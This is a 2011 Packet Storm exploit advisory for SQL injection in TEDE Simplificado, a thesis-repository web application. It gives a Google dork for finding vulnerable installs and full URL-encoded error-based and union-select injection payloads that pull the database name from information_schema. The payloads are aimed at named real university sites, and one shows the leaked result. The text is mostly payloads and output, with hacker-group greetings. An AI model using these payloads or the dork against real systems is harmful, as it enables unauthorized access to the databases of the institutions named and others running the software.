TEDE Simplificado SQL Injection

2011-06-01T00:00:00
ID PACKETSTORM:101876
Type packetstorm
Reporter KnocKout
Modified 2011-06-01T00:00:00

Description

                                        
                                            `======================================================  
TEDE Simplificado <= (Versions) SQL Injection Vulns  
======================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1  
3 3  
3 _ __ __ ________ __ __ 3  
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7  
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1  
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3  
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3  
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7  
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1  
3 >> Exploit database separated by exploit 3  
3 type (local, remote, DoS, etc.) 3  
7 7  
1 [+] Site : 1337db.com 1  
3 [+] Support e-mail : submit[at]1337db.com 3  
3 3  
7 ############################################ 7  
1 I'm KnocKout 1337 Member from 1337 DataBase 1  
3 ############################################ 3  
3 3   
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[~] HomePage : http://h4x0resec.blogspot.com  
[~] Reference : http://h4x0resec.blogspot.com  
[~] Special Thanks : Kalashinkov3 <= :)  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : desenvolvido  
|~Price : N/A  
|~Version : N/A  
|~Software: http://www.ibict.br/  
|~Vulnerability Style : SQL Injection  
|~Vulnerability Dir : /  
|~sqL : MysqL   
|~Google DORK : inurl:/tde_busca/  
-- Good.:)  
|[~]Date : "26.11.2010"  
|[~]Tested on : Demo's  
Apache  
MySQL >=4.1  
MySQL >=5  
  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
processaPesquisa.php   
tde_fut.php Files Not Sec.  
  
  
http://Target/tde_busca/processaPesquisa.php?pesqExecutada={ID]&id={ID} SQL Inject!  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
For Version : v-IBICT -   
  
http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663 {SQL]  
  
http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1  
MYSQL WRÝTES : Query failed (autor): Duplicate entry '~'TDE'~1' for key 1  
Database Found : TGE  
  
To be continue!  
  
For Version : v1.01  
  
http://etd.uns.edu.ar/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4  
  
For Version : vS2.04   
  
http://www.bdtd.ndc.uff.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=2951%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1  
=============================================================  
  
.__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \   
| Y \/ ^ /> <\ \_/ \ | \/\ ___/   
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/   
_____________________________   
/ _____/\_ _____/\_ ___ \   
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
Was Here.  
  
  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz  
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....   
`